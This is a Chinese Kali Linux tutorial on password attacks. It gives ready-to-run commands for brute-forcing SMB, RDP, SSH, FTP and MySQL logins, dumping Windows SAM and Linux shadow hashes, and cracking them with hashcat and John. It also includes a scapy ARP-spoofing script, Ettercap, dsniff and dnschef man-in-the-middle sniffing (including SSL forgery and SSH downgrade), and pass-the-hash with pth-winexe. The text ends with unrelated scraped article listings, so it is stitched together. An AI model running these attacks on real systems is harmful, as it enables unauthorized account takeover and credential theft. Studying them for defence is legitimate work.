当目标系统无任何已知漏洞时,可以考虑社会工程学或者获取目标系统的用户身份,通过合法账户登录绕过系统的安全防线。账户登录身份认证包括账号密码、passphrase、密保、手机、指纹、声纹、面部识别等,其中账号密码是安全级别较低的认证方式,基于互联网的身份认证仍以账号密码为主要形式。

密码破解的方法通常有基于社会工程学的人工猜测基于字典的暴力破解以及基于中间人攻击的密码嗅探

 

文章目录

  • 一、字典
    • (一)Crunch
    • (二)Cupp
    • (三)Cewl
    • (四)John the Ripper
  • 二、在线破解
    • (一)Hydra
    • (二)Medusa
  • 三、离线破解
    • (一)获取HASH
    • (二)识别HASH
    • (三)碰撞破解
  • 四、密码嗅探
    • (一)基本原理
    • (二)攻击实现
  • 五、Pass the HASH(PTH)

 

一、字典

字典是暴力破解的基础,根据已有信息生成精简高效、命中率高的字典是暴破成功的关键。一些字典资源在kali/usr/share/wordlist//usr/share/wfuzz/wordlist/等目录中可以找到,其他需要结合已有信息生成高效的字典,这里介绍四种字典生成工具。

(一)Crunch

强大的字典生成工具,基本规则:crunch <min-len> <max-len> [<charset string>] [options]
eg:

crunch 6 6 0123456789 -o START -d 2 -b 1mb / -c 100 
# -b 按大小分割字典(kb/kib、 mb/mib、 gb/gib)
# -c 按行数分割字典
# 以上两个参数必须与-o START结合使用,-o START为按顺序排列字典
# -d 同一字符最多连续出现数量,如果使用-t参数,则-d后要跟上不重复字符的类型,如-d@或-d%^crunch 4 4 -f /usr/share/crunch/charset.lst lalpha-sv -o 1.txt
# 指定charset.lst中的字符集crunch 4 5 -p dog tiger bird
crunch 1 1 -p 1234567890
# 在指定的参数中排列组合(无重复)
# -p必须是最后一个参数,与-s 参数不兼容(-s指定起始字符串)
# 最大、最小字符长度失效,但必须存在crunch 6 6 -t @,%%^^ -z 7z
# @ 代表小写字母 lalpha
# , 代表大写字母 ualpha
# % 代表数字 numeric
# ^ 代表符号 symbols
# 输出压缩文件,7z压缩比率最大crunch 1 1 -q word
# 读取word文件每行内容作为基本字符生成字典
# 最大、最小字符长度失效,但必须存在crunch 5 5 abc DEF + \!@# -t ,@^%,
# + 占位符,如果不使用指定的字符集,则需要使用加号占位;这里没有指定数字字符集,而是采用默认的0123456789,所以用+来占位
# \ 转义符(转义空格、符号)crunch 5 5 -t ddd%% -p dog drag bird
# 任何不同于,@^%以及-p指定的值都是占位符crunch 2 4 0123456789 | aircrack-ng a.cap -e MyESSID -w -
# 为节省空间,可以将生成的字典直接作为输入给爆破程序使用

(二)Cupp

交互输入信息,按输入的信息生成专属的密码字典,需要在GitHub上下载。

git clone https://github.com/Mebus/cupp.git
./cupp.py -i      #交互输入信息

(三)Cewl

在破解具体门户网站用户的密码时,可以结合网站中出现频率较高的关键词,通过收集网站信息生成字典。
eg:

cewl 1.1.1.1 -m 3 -d 3 -e -c -v -w a.txt
# -m:最小单词长度
# -d:爬网深度
# -e:收集包含email地址信息
# -c:显示每个单词出现次数
# 支持代理

通过cewl查找到的素材往往需要经过筛选,作为爆破字典的一部分使用。同时要考虑将关键词进行变型,如末尾增加数字、大小写变化、字符与字符数字相互转换等,通常结合John等其他字典生成工具使用

(四)John the Ripper

John本身是一个功能强大的离线密码破解工具,同时能让我们在已有字典基础上外加规则,将基础词汇变型,得到词汇更加丰富的字典。实现字典词汇的动态变型,首先要在John的配置文件/etc/john/john.conf中修改规则,在配置文件中有很多section,以中括号标志,在section中可以定制自己需要的规则。
eg:

# 在[List.Rules:Wordlist]中存放了对基础字典进行变型的规则,使用password.lst时自动调用
# 在[List.Rules:Wordlist]中添加内容,表示在原有字典基础上末尾加数字进行扩展
[List.Rules:Wordlist]
$[0-9]
$[0-9]$[0-9]
$[0-9]$[0-9]$[0-9]# 修改后使用命令
john --wordlist=cewl.txt --rules --stdout > m.txt
# --wordlist指定已有的基础字典cewl.txt
# --rules表示调用配置文件中的规则,默认为Wordlist

也可以自己生成字典规则进行使用,如在配置文件中添加:

[List.Rules:test]
$[0-9]$[0-9]$[0-9]$[a-zA-Z]
$[0-9]$[0-9]$[0-9]$[a-zA-Z]$[a-zA-Z]$[a-zA-Z]$[~!@#$%^&*()\-_=+]
# 修改后使用命令
john --wordlist=cewl.txt --rules=test --stdout > m.txt
#当rules规则不是用默认的Wordlist时,需要用--rules指定

二、在线破解

在线破解的基本原理是:利用工具不断给目标主机发送验证请求,通过响应信息判断是否成功登陆。当目标主机设置了较完善的登陆限制时(锁定阈值、单位时间请求限制等),破解效率较低。

(一)Hydra

  • 优势:速度非常快,支持协议多
  • 劣势:运行不稳定;速度太快,以至于有些服务会拒绝响应;每主机新建进程,浪费资源

基本规则:hydra server service [options]

eg:

hydra -l administrator -P pass.lst smb://1.1.1.1/admin$ -vV
hydra -l administrator -P pass.lst rdp://1.1.1.1 -t 1 -vV
# admin$ 是windows系统中的共享文件
# -t :主机并发登录数量限制hydra -L user.lst -P pass.lst ftp://1.1.1.1 -s 2121 -e nsr -o p.txt
# -s :当服务开启的不是默认端口时用来指定端口
# -e nsr :添加空密码、用户名以及用户名倒序的检查
# -o :将找到的login/password写入指定文件

Hydra中还自带了用于筛选字典的工具 pw-inspector,可以基于已有字典进行筛选。
eg:

pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l -m 6 -M 7
# -l :筛选小写字母集
# -m :筛选最小长度
# -M :筛选最大长度

注:Hydra支持表单破解,但功能有些鸡肋,表单破解建议使用Burp Suite

(二)Medusa

  • 优势:运行稳定,速度控制得当;基于线程运行
  • 劣势:支持协议有待完善(目前仍不支持RDP)

基本规则:medusa -M modules [options]

eg:

# 查看支持模块
medusa -d# 破解windows密码
medusa -M smbnt -h 1.1.1.1 -u administrator -P pass.lst -n 4455 -e ns -F
# -n :当服务开启的不是默认端口时用来指定端口
# -e ns :检查空密码和用户名
# -F : 找到正确密码后停止继续检查# 破解Linux SSH密码
medusa -M ssh -h 192.168.20.10 -u root -P pass.lst -e ns -t 3 –F
# -t : 主机并发登录数量限制# mysql服务密码破解
medusa -M mysql -h 1.1.1.1 -u root -P pass.lst -e ns -F

三、离线破解

计算机利用单向HASH算法,将密码映射成HASH值存储,在线破解的基本原理即设法获取这些HASH值,然后利用工具进行碰撞破解或者采用PTH。HASH加密算法包括MD5、MD4、SHA128、SHA256等,不同的HASH类型碰撞破解方法不同,基本思路:

  • 获取密码HASH
  • 识别HASH类型
  • 利用离线破解工具碰撞密码HASH

相比于在线破解的优势:

  • 不会触发密码锁定、登录限制等安全机制
  • 不会产生大量登陆失败日志引起管理员注意

(一)获取HASH

Windows系统登录后SAM文件是被锁死的,不能复制、移动,正常情况下打开是乱码或空白,窃取SAM文件可以登录并提权后用mimikatz、wce等工具,或者采取物理接触等非登录手段。

1.shell登陆

取得shell后利用漏洞提权,通过工具获取HASH值:mimikatz、wce等,参见:

Kali Linux渗透测试——提权

2.物理接触

首先通过Kali ISO启动Live模式虚拟机,然后利用samdump2工具:

mount /dev/sda1 /mnt             #挂载Windows主机磁盘
cd /mnt/Windows/System32/config  #SAM文件存放位置
samdump2 SYSTEM SAM -o sam.hash  

获取HASH文件后,可以用 nc 等工具进行传输

(二)识别HASH

一些离线破解工具自带HASH算法识别功能,也可以利用专用识别工具如:

  • hash‐identifier
  • hashid

一些常见的HASH算法长度:MD5(128bit、256bit)、SHA1(160bit)、SHA256(256bit)、SHA512(512bit)、MTLM(128bit)

注:可能识别错误或无法识别

(三)碰撞破解

1.Hashcat

强大的开源多线程密码破解工具,号称世界上最快的密码恢复工具,支持80多种加密算法破解,目前仅支持基于CPU计算能力破解。

有七种破解模式:

  • 0 Straight:字典破解
  • 1 Combination:将字典中密码进行组合(1 2 > 11 22 12 21)
  • 2 Toggle-Case:尝试字典中所有密码的大小写字母组合
  • 3 Brute-force:指定字符集(或全部字符集)所有组合进行暴破
  • 4 Permutation:字典中密码的全部字符置换组合(12 21)
  • 5 Table-Lookup:程序为字典中所有密码自动生成掩码
  • 8 Prince:王子破解

基本规则:hashcat [options] hashfile [mask|wordfiles|directories]

eg1:基本使用

hashcat -b --force
# -b:查看系统性能针对每个算法的破解速度
# 虚拟机环境需要将CPU内核数量设置为1,并加上--force忽略警告,否则会报错hashcat -m 100 hash.dump pass.lst
# 默认以破解模式0运行
# -m:指定HASH算法hashcat -m 0 hash.txt -a 3 ?l?l?l?l?l?l?l?l?d?d
# -a:指定破解模式,默认为模式0
# ?l:所有小写字符集
# ?u:所有大写字符集
# ?d:所有数字字符集
# ?s:所有特殊符号字符集
# ?a:以上所有字符集hashcat -m 100 -a 3 hash.dump --increment --increment-min 6 --increment-max
8 ?l?l?l?l?l?l?l?l
# --increment:开启increment模式

eg2:破解Linux系统账号密码

Linux shadow文件记录格式为:
USERNAME:$HASH_ID$SALT$HASH:MODIFY_DATE:DISABLE_MODIFY_TIME:EXPIRE_TIME::::

例如:root:$6$OvgkjqcxNCBY2Ypk$UXUteT4hFhn.HNbsgzCB86jOa0rtngw9N3mgPZZFn9PMHUDOvkjZwklz/R1KwG0WT42nA.1cBsGMPNTlW2hGA/:18181:0:99999:7:::

其HASH值为:
UXUteT4hFhn.HNbsgzCB86jOa0rtngw9N3mgPZZFn9PMHUDOvkjZwklz/R1KwG0WT42nA.1cBsGMPNTlW2hGA/

hashcat -a 0 -m 1800 \$6\$OvgkjqcxNCBY2Ypk\$UXUteT4hFhn.HNbsgzCB86jOa0rtngw9N3mgPZZFn9PMHUDOvkjZwklz/R1KwG0WT42nA.1cBsGMPNTlW2hGA/ wordlist.txt -o crack.hash --force
# $在Linux环境下需要转义
# 破解成功Status......:Cracked,破解失败Status......:Exhausted
# 必须指定破解模式,-m 1800为 sha512crypt $6$, SHA512 (Unix)

eg3:破解Windows系统账号密码

Windows sam文件记录格式为:
USERNAME:SID:LM-HASH:NT-HASH:::

例如:
Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::

LM-HASH和NT-HASH是对同一个密码的两种不同的加密方式,LM-HASH已不再使用,其NT-HASH(即NTLM-HASH)值为:
683020925C5D8569C23AA724774CE6CC

hashcat -a 0 -m 1000 sam.ntlmhash wordlist.txt -o crack.hash --force
# sam.ntlmhash中仅保留NT-HASH部分

2.oclHashcat

号称世界上最快、唯一的基于GPU的密码破解软件,免费开源、支持多平台、支持分布式、支持150+hash算法,对硬件要求较高:

  • 虚拟机中无法使用
  • 支持 CUDA 技术的Nvidia显卡
  • 支持 OpenCL 技术的AMD显卡
  • 安装相应的驱动

使用方法基本同Hashcat
eg:

oclHashcat -m 0 hash.txt -a 3 ?a?a?a?a?a?a?a

最新版本kali已将oclHashcat移除

3.John the Ripper

功能强大的离线密码破解工具,支持众多服务应用的加密破解,john --list=formats查看支持服务,同时支持某些对称加密算法破解。

默认破解模式分为三种,破解时依次运行:

  • Single crack:默认被首先执行,使用Login/GECOS信息尝试破解
  • Wordlist:基于规则的字典破解,主配文件中已指定 ‘Wordlist=$JOHN/password.lst’
  • Incremental:所有或指定字符集的暴力破解

eg1:破解Linux系统账号密码

john -test
# 查看系统性能针对每个算法的破解速度unshadow /etc/passwd /etc/shadow > pass.txt
# 合并passwd和shadow文件john pass.txt
# 按照single、wordlist、incremental模式依次运行cat ~/.john/john.pot
# 破解的密码信息存在~/.john/john.pot中

eg2:破解windows系统账号密码

john sam.dump -wordlist=myPassword -format=nt
# 指定字典为myPassword,指定HASH算法,而不是采用john检测的结果
# Windows中HASH采用NTLM算法cat ~/.john/john.pot
# 查看破解结果

eg3:破解rar、zip等加密文件

# 以rar破解为例
rar2john passwd.rar >> rar.hash
# 内容为:wang.rar:$RAR3$*0*acf59f84ca43dda0*5e32875725a0b7128483237ea4c5024e:0::::wang.rar
john rar.hash -wordlist=wordlist.txt
cat ~/.john/john.pot

rar2john提取HASH值后,也可以用hashcat进行破解:

# 保留其密钥信息:$RAR3$*0*acf59f84ca43dda0*5e32875725a0b7128483237ea4c5024e
hashcat -h
# 查看HASH加密类型对应ID
# RAR3-hp类型为12500
# RAR5类型为13000hashcat -a 3 -m 12500 \$RAR3\$*0*acf59f84ca43dda0*5e32875725a0b7128483237ea4c5024e ?d?d?d?d?d?d -o crack.hash --force

4.RainbowCrack

基于时间记忆权衡技术生成彩虹表,提前计算密码的HASH值,通过比对HASH值破解密码,不用每次破解都重新计算,但是计算HASH的速度很慢,修改版可以支持CUDA GPU。

彩虹表生成工具:RainbowCrack,下载地址: http://project-rainbowcrack.com/rainbowcrack-1.7-linux64.zip ,基本命令(必须顺序使用):

  • rtgen:预计算,生成彩虹表,耗时的阶段
  • rtsort:对rtgen生成的彩虹表进行排序
  • rcrack:查找彩虹表破解密码

目前支持算法仅包括:LM、NTLM、MD5、SHA1、SHA256

eg:

#下载解压并进入目录
wget http://project-rainbowcrack.com/rainbowcrack-1.7-linux64.zip
unzip rainbowcrack-1.7-linux64.zip && cd rainbowcrack-1.7-linux64
#改变可执行文件的使用权限
chmod 754 rcrack rt2rtc rtc2rt rtgen rtmerge rtsort#./rtgen -h 
rtgen md5 loweralpha 1 7 0 1000 1000 0
rtgen md5 loweralpha 1 7 0 -bench
#-bench :查看彩虹表生成速度#./rtsort -h 
rtsort /md5_loweralpha#1-7_0_1000x1000_0.rt #./rcrack -h 
rcrack *.rt -h 5d41402abc4b2a76b9719d911017c592
#用彩虹表爆破单个HASH
rcrack *.rt -l hash.txt
#用彩虹表爆破HASH文件,每行一个HASH

计算彩虹表时间可能很长,所以一般下载彩虹表使用,常用网址:
Free Rainbow Tables
RainbowCrack Tables

四、密码嗅探

基本原理:利用中间人攻击,嗅探、分析目标和网络节点之间的数据包,完成密码窃取。
中间人攻击

图1 中间人攻击

(一)基本原理

注意节点设备集线器和交换机的区别:

  • 集线器工作在一层,全端口转发数据包,不作任何过滤
  • 交换机工作在二层,交叉总线矩阵使端口之间独享带宽,根据MAC地址表对数据进行过滤,减缓流量拥塞状况

因此集线器连接的设备网卡在混杂模式可以收到所有设备发出的数据包,而交换机连接的设备网卡在混杂模式默认只能收到发给自己的单播数据包和广播数据包。

1.ARP欺骗

ARP协议设计有严重安全缺陷,建立连接过程仅包括请求和响应两个部分,这两个部分相对独立,响应数据包可以单独伪造,和请求之间没有必然联系,所以它也被称为基于传闻的协议,网络设备不会去验证ARP响应信息的来源。攻击者可以伪造网关的ARP ACK或者Request包,对攻击目标实施欺骗,使得攻击目标数据包经由攻击者转发,实现信息嗅探。

2.ICMP重定向

ICMP通常用于完成差错通知和信息查询,在特定的情况下,当路由器检测到一台机器使用非优化路由的时候,它会向该主机发送一个ICMP重定向报文,请求主机改变路由,指导数据包的正确流向,正常工作时如图2所示:

(图片来源:https://www.cnblogs.com/KevinGeorge/p/7866840.html), 其中R1提示C1改变路由即是应用ICMP。
ICMP重定向原理

图2 ICMP重定向原理

ICMP重定向报文没有协议状态检查,以及合法性机制验证,可以结合ARP欺骗,通过伪造网关向攻击目标发送ICMP重定向报文,使得攻击目标数据包经由攻击者转发,实现信息嗅探。

注意:路由器不会响应ICMP重定向包,路由重定向只对客户端有效,数据转发过程是单工通信。

3.DHCP欺骗

DHCP建立连接包括 Discover->Offer->Request->Ack 四个部分,当需要分配IP的主机发出Discover或Request包时,攻击者立即响应,修改配置指定自身IP为网关地址,使得攻击目标数据包经由攻击者转发,实现信息嗅探。

注意:网关不会响应DHCP Offer、Ack 包,DHCP欺骗只对客户端有效,数据转发过程是单工通信。

4.交换机端口欺骗

交换机在记录MAC地址转发表时,会根据数据包的源MAC地址进行学习,如果伪造数据包,将源MAC地址设置为攻击目标MAC地址,目的MAC地址设置为自身MAC地址,这样发出的数据包可以诱使其他主机将本应发往攻击目标的数据发给自己,从而实现嗅探信息。适合ARP静态绑定的环境。

5.DNS欺骗

DNS查询分为两个过程,第一个过程是查询主机到本地域名服务器的过程,为递归查询,第二个过程为本地域名服务器到根域名服务器、顶级域名服务器、权限域名服务器的查询过程,为迭代查询,最后本地域名服务器将查询结果返回给查询主机。DNS欺骗通过响应目标主机的查询数据包完成欺骗,配置错误的IP地址。

6.SSL/TLS证书伪造

HTTPS,即 HTTP over SSL/TLS,其建立链接主要是用非对称加密传输对称加密密钥的过程, 之后通信数据用对称密钥加密。SSL/TLS证书是用CA机构私钥加密的Server公钥信息,证书伪造即攻击者在可以截获攻击目标上行数据的基础上,完成ServerHello以及之后的工作,同时向真正的服务器发送相同的HTTPS请求建立连接,完成攻击目标和服务器之间的数据中转,以此进行信息嗅探。

HTTPS建立通信过程

图3 HTTPS建立通信过程

(二)攻击实现

1.编写脚本

例如用python中scapy模块编写发包脚本,实现ARP欺骗:

from scapy.all import *
etherSec = Ether(dst="00:0c:29:0c:54:a4",src="00:0c:29:49:54:4a") 
# dst是目标主机MAC地址,src是嗅探主机MAC地址arpSec = ARP(pdst="192.168.43.23",psrc="192.168.43.1")    
# pdst是目标主机ip,psrc是网关iparpPack = etherSec/arpSec
for i in range(6000):sendp(arpPack)print('arpPack send OK\n')time.sleep(1)

攻击成功后,可以看到攻击目标中ARP记录网关MAC地址已更改:

ARP欺骗结果

图4 ARP欺骗结果

2.Ettercap

Ettercap是经典的中间人攻击工具集,支持SSH1、SSL/TLS中间人攻击,用户操作界面分为四种:-T(文本界面)、-G(图形界面)、-C(基于文本的图形界面)、-D(后台模式),划分为五个模块:

(1)Sniffer:负责数据包转发,分为Unified和Bridge:

  • Unified:单网卡情况下使用,独立 完成三层数据包转发,过程中禁用内核IP_Forward功能。
  • Bridge:双网卡情况下一层MITM模式,相当于两个网卡桥接,隐蔽性高,不可用于网关。

(2)MITM:把流量重定向到Ettercap主机,MITM模块包括:ARP欺骗、ICMP重定向、DHCP欺骗、DNS欺骗、交换机端口欺骗等。指定目标格式:MAC/IPs/IPv6/Ports
eg:

ettercap -i eth0 -T -M arp:remote -q /192.168.1.1// /192.168.1.2// -F 1.ef -P autoadd -w a.cap -l loginfo -L logall -m message
# -T:命令行模式
# -M:指定MITM模块,arp:remote全双工嗅探数据
# -q:只会打印用户、密码等重要信息
# -F:指定Filter
# -P:指定Plugin
# -w:嗅探所有的网络流量写入指定pcap文件
# -l:记录关键日志信息,生成记录信息的文件格式为eci,需要用etterlog查看
# -L:记录所有日志信息,生成记录信息的文件格式为eci,记录数据包的文件格式为ecp,需要用etterlog查看
# -m:记录所有的操作信息#SSL/TLS MITM
vim /etc/ettercap/etter.conf
# 在配置文件中在Linux section下将reidr_command_on和reidr_command_off配置行加上,这样再进行MITM攻击时会自动完成SSL/TLS证书伪造

(3)Filter:利用脚本进行数据筛选,/usr/share/ettercap/中带filter的都是筛选文件
eg:

# SSH-2.xx(only support ssh2)/SSH-1.99(support ssh1 and ssh2)/SSH-1.51(only support ssh1)
# 目前ettercap只能对ssh1进行MITM攻击
# 进行ssh链接请求时,ettercap会截获ssh服务器返回的response包
# 如果ssh服务器提供的是1.99版本,则将服务降级到ssh1版本
etterfilter etter.filter.ssh -o ssh.ef
# 对etter.filter.ssh源文件进行编译,生成ef可执行文件,执行ettercap命令时进行调用
# 该filter可以探测攻击目标的ssh版本,若是1.99则会降级为1.51

(4)Log:日志记录,文件格式为eci(信息日志)和ecp(数据日志),内容经过加密,需要通过etterlog查看
eg:

etterlog -p log.eci 
# 查看获取的用户、密码信息etterlog -c log.ecp 
# 列出Log中的数据包信息etterlog -c -f /1.1.1.1/ log.ecp
# 只列出源地址或终端地址为target的数据包

(5)Plugin:集成插件,包括dns_spoof等模块
eg:

vim /etc/ettercap/etter.dns
# 修改Ettercap中的域名重定向文件ettercap -Tq -M arp:remote -i eth0 /192.168.1.1// /192.168.1.1// -P dns_spoof

注意:Ettercap默认只有在创建socket时会调用root权限,后续操作都都是以nobody身份运行,ec_uid为65534,可能导致后续读写文件受限,运行时可以在其主配文件 /etc/ettercap/etter.conf 中将ec_uid修改为0,但是安全性会降低。

3.其他工具

除了像Ettercap一类的MITM工具集,还有一些功能相对单一的MITM工具:

  • Dsniff:功能强大的网络嗅探工具包,集 dsnifffilesnarfmailsnarfurlsnarfwebspyarpspoofdnsspoof 等工具于一体,最新版本在2001年就已经发布,早已不再更新,目前 Kali 中不再默认安装 dsniff,需要下载。

  • driftnet :图片截取工具

  • dnschef:DNS欺骗工具

apt-get install dsniff# kali中ip数据包转发的功能默认是关闭的,需要开启
echo 1 > /proc/sys/net/ipv4/ip_forwardarpspoof -i eth0 -t 192.168.43.23 -r 192.168.43.1
# -t:攻击目标ip,-r:网关ip
# 攻击成功后攻击者就成了中间人,转发攻击目标和网关之间的信息# 在完成ARP欺骗后,可以进一步使用dsniff、urlsnarf、webspy、driftnet等工具进行攻击
dsniff -i eth0 -m
# 仅截取流量中的密码信息
# -m:自动加密方式检测
# /usr/share/dsniff/dsniff.services文件存放触发加密算法urlsnarf -i eth0
# 截取本机网卡流量中的urlwebspy -i eth0 1.1.1.10
# 截取指定主机web网址
# 目前运行仍不稳定driftnet -i eth0 -a -d tempdir
# -a:不实时显示图片,将截取图片保存到temdir目录
# -d:指定图片保存目录# 使用dnschef的前提是能够修改攻击目标的本地域名服务器
# 将其配置为攻击者的IP,然后使用dnschef命令
dnschef --fakeip=1.1.1.10 --fakedomains=www.google.com,www.youtube.com -q
# --fakeip:被欺骗的域名要访问的IP
# --fakedomains:需要欺骗的域名

五、Pass the HASH(PTH)

密码破解耗费时间资源巨大,对于没有加盐的静态HASH认证登录,可以使用密文直接提交给服务器完成身份认证,这种攻击方式对企业中使用ghost等工具克隆安装的系统更有威胁性。

  • NTLM/LM是没有加盐的静态HASH,可以基于此对Window系统采用PTH攻击

eg:

pth-winexe -U w7%aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063716ab7fe2a11faf126d8 //1.1.1.1 cmd
# 使用方法:pth-winexe [OPTION]... //HOST COMMAND
# -U USERNAME[%HASH_PASS]
查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. Hadoop配置文件详解(core-site.xml、hdfs-site.xm、mapred-site.xml、yarn-site.xml)

    Hadoop可配置参数详解配置文件名配置对象主要内容core-site.xml集群全局参数用于定义系统级别的参数,如HDFS URL、Hadoop的临时目录等hdfs-site.xmlHDFS参数如名称节点和数据节点的存放位置、文件副本的个数、文件读取权限等mapred-site.xmlMapreduce参数包括JobHistory Serv…...

    2024/5/8 23:14:27
  2. 无线模块SIM8050

    SIMCom提出了一种基于Qualcomm MSM8953platform的超简洁可靠的无线模块SIM8050。sim8050是一个智能模块,设计了非常强大的处理器,允许用户从低功耗的低成本产品解决方案中受益。技术支持←_← 产品详情 一般特征 •WIFI 2.4/5G 802.11a/b/g/n/ac高达433Mbps 勒•BT2.1 + EDR …...

    2024/5/8 13:21:02
  3. Spring Security系列二

    Spring Security是一个功能强大且高度可定制的身份验证和访问控制框架。它是用于保护基于Spring的应用程序的实际标准。Spring Security是一个框架,致力于为Java应用程序提供身份验证和授权。与所有Spring项目一样,Spring Security的真正强大之处在于可以轻松扩展以满足自定义…...

    2024/5/5 23:19:56
  4. VMware虚拟机安装Centos后的静态网络配置方法(ping 通外网)

    对于没有远程服务器想搭建单机版Linux环境的同学,虚拟机的配置很重要,尤其是当需要yum源或者rpm安装软件时没有网络是很头大的,现将配置vmvare虚拟机和静态网络几个重要步骤和关键配置整理如下: 前提:vmvare 12 centos 7.2 windows本地有网络(这里以有线以太网演示,WiFi…...

    2024/4/20 11:19:17
  5. 室内定位下的智能养老看护系统追踪报警解决方案--室内定位--新导智能

    近年来,随着室内定位技能精度的提高,室内定位为监狱、零售、制作、医疗、机器人、养老等职业供给非常精确的方位信息数据,成为物联网年代的重要根底。未来是物联网的年代,而室内定位技能作为物联网感知网络的底层根底,将可以取得更大的市场机会。ZigBee定位技能养老院人员…...

    2024/5/8 19:13:41
  6. 记录SpringBoot学习之旅

    文章目录SpringBoot感谢秦老师 指路: [秦老师](https://www.bilibili.com/video/BV1PE411i7CV)什么是SpringSpring是如何简化Java开发的什么 SpringBoot微服务什么是微服务?单体应用架构微服务架构如何构建微服务第一个SpringBoot程序自动装配原理初探pom.xml启动器:主程序注解…...

    2024/4/24 9:46:01
  7. 分布式电商项目十七:商品服务-三级分类和查询

    商品服务-三级分类和查询 我们的项目是做一个电商的网站,拿京东的网站作为对比:在右端进行商品大类的选择时,会出现很多小的类别,作为商品的三级分类,这样便于用户查询商品,本章开始开发这部分功能。 数据库支持 首先我们看一下分类查询功能的数据库支持;打开pms数据库中…...

    2024/5/9 2:26:18
  8. xp怎样升级win7系统的傻瓜教程--win10专业版

    尽管XP一直是微软的经典系统,但随着时代的发展,XP系统已经无法发挥硬件的性能。很多用户也希望体验到新版的微软系统,所以很多人会将XP系统升级到win7系统。那么xp怎样升级win7呢?win7系统升级的方法有很多,其中硬件解压安装升级和U盘安装升级是最常用的两种方法。下面的小…...

    2024/5/8 21:31:30
  9. ffmpeg音视频同步

    没有实现,可能是时间戳同步问题 #include <stdio.h> #include<iostream> #include<Windows.h> #define __STDC_CONSTANT_MACROS#ifdef _WIN32 //Windows extern "C" { #include "libavcodec/avcodec.h" #include "libavformat/avf…...

    2024/5/8 21:24:33
  10. Hadoop编译源码(面试重点)

    昨天开始编译的,也不算是踩坑。跟着尚硅谷教程走的,直接分享一下老师的笔记吧。提个醒,编译过程有几次一直出现“-------”这玩意,不代表完成了,要等到后面那张图才代表完事了。我编译了大概90分钟,按教程搞,一遍过。再说点吧,教程是这么操作的,root用户,在"/op…...

    2024/4/24 9:45:57
  11. 阿里云“在家实践”计划测试题答案(部分)

    因新冠肺炎疫情,学校延期开学。在家时间不浪费,提高技能好机会。阿里云弹性计算联合开发者社区,推出高校“在家实影”计划,全国高校学生,每人可免领取一台云服务器ECS算力资源,在线实践影课程等资源。 阿里云高校——学生“在家实践”计划MyBlog:阿里云在家实践计划测试题…...

    2024/5/8 12:54:23
  12. EfficientPS论文翻译-------第二部分:相关工作

    EfficientPS: Efficient Panoptic Segmentation论文翻译-------第二部分:相关工作 全景分割是最近提出的一个场景理解问题(Kirillov et al, 2019),它统一了语义分割和实例分割的任务。对于这些子任务,已经提出了许多方法,但是只有少数方法被引入来处理全景分割的连贯场景理…...

    2024/5/9 0:42:38
  13. MPP update优化一

    前言:对于列式存储直接update性能低下,可采用update+insert方式或者delete+insert 方式 实现更新操作例子:套牌车的一个测试例子drop table dts_vehicle_resource.fake_plate_info_sp; drop table viid_vehicle.vehiclestructured_kafka_sp; drop table dts_vehicle_resourc…...

    2024/4/24 9:45:54
  14. AOP序列化目标方法参数时报错

    问题:ServletRequest、ServletResponse不能被序列化使用google.gson会OOM使用alibaba.fastjson会抛出非法参数异常原因:ServletRequest、ServletResponse是Interface解决方案:private Object[] excludeJoinPointArgs(JoinPoint joinPoint) {Object[] args = joinPoint.getAr…...

    2024/5/8 14:10:10
  15. 查看iOS APP Bundle ID 报错 Could not connect to lockdownd. Exiting.

    IOS APP Bundle ID是APP的唯一标识,以下简称BID,可以用ideviceinstaller -l查看。 最近用此命令查看的时候报错了: Could not connect to lockdownd. Exiting.查了一些资料后,发现是因为很多依赖库太老了,更新一下就可以了。 本文使用的macOS版本是10.15.5。 # 更新brew b…...

    2024/5/8 19:39:10
  16. 饱和度和明度

    饱和度:指颜色的纯度或强度,简单点理解就是颜色中的灰色量含量的高低。明度:指的是颜色中混合了多少白色或黑色。 饱和度、明度越高,视觉冲击力越强烈;饱和度、明度较低的时候,视觉上越温和。高级感的色彩是克制的,表现的精致、稳重、具有品质感。低饱和、低明度的摄影作…...

    2024/5/8 13:05:37
  17. uni-app 修改组件默认样式

    修改 uni-app 组件默认样式 转载做下记录 切记类似于微信原生的,颜色不能修改有平台差异性。 最近刚开始使用uniapp开发,有些组件渲染之后会生成一些标签,我需要修改生成标签的样式。 直接写: <style scoped>.uni-combox__input {font-size: 14px;} </style>无…...

    2024/5/9 2:29:11
  18. 《数据结构与算法指南》01:算法概述汇总

    内容导航:前言 1、何谓算法 2、算法的特征 3、算法的发展历史 4、算法的分类 5、算法相关概念 6、算法的表示法 7、算法性能评估 8、简单案例前言 夸张点说,如果有人因为说过一句话而被授予图灵奖、计算机科学教育杰出贡献奖、Emanual Piore奖和计算机先驱奖,您是不是很惊讶…...

    2024/5/9 2:31:28
  19. DVWA——Brute Force暴力破解(Medium)

    DVWA——Brute Force 暴力破解 Low.学习源码 <?phpif( isset( $_GET[ Login ] ) ) {// Sanitise username input$user = $_GET[ username ];$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysql…...

    2024/4/24 9:45:48
  20. Opencv中rectangle函数与Rect函数的用法

    rectangle函数是用来绘制一个矩形框的,通常用在图片的标记上。 1.rectangle(img2, Point(j,i), Point(j + img4.cols, i + img4.rows), Scalar(255, 255, 0), 2, 8);img2:被处理的图片 Point(j,i)代表矩形左上点的坐标 Point(j + cols, i + rows)代表矩形右下点的坐标【矩形的…...

    2024/4/24 9:45:50

最新文章

  1. JAVA基础JSP之JavaBean模式

    JavaBean模式 1 JavaBean简介及设计原则 【JavaBean简介】符合某种特定的规范的Java类&#xff0c;使用Javabean的好处是解决代码重复编写&#xff0c;减少代码冗余&#xff0c;功能区分明确&#xff0c;提高了代码的维护性。[S1] 1.for循环 2.jdbc中的dao模式 【Javabean…...

    2024/5/9 4:52:14
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/5/7 10:36:02
  3. 3d representation的一些基本概念

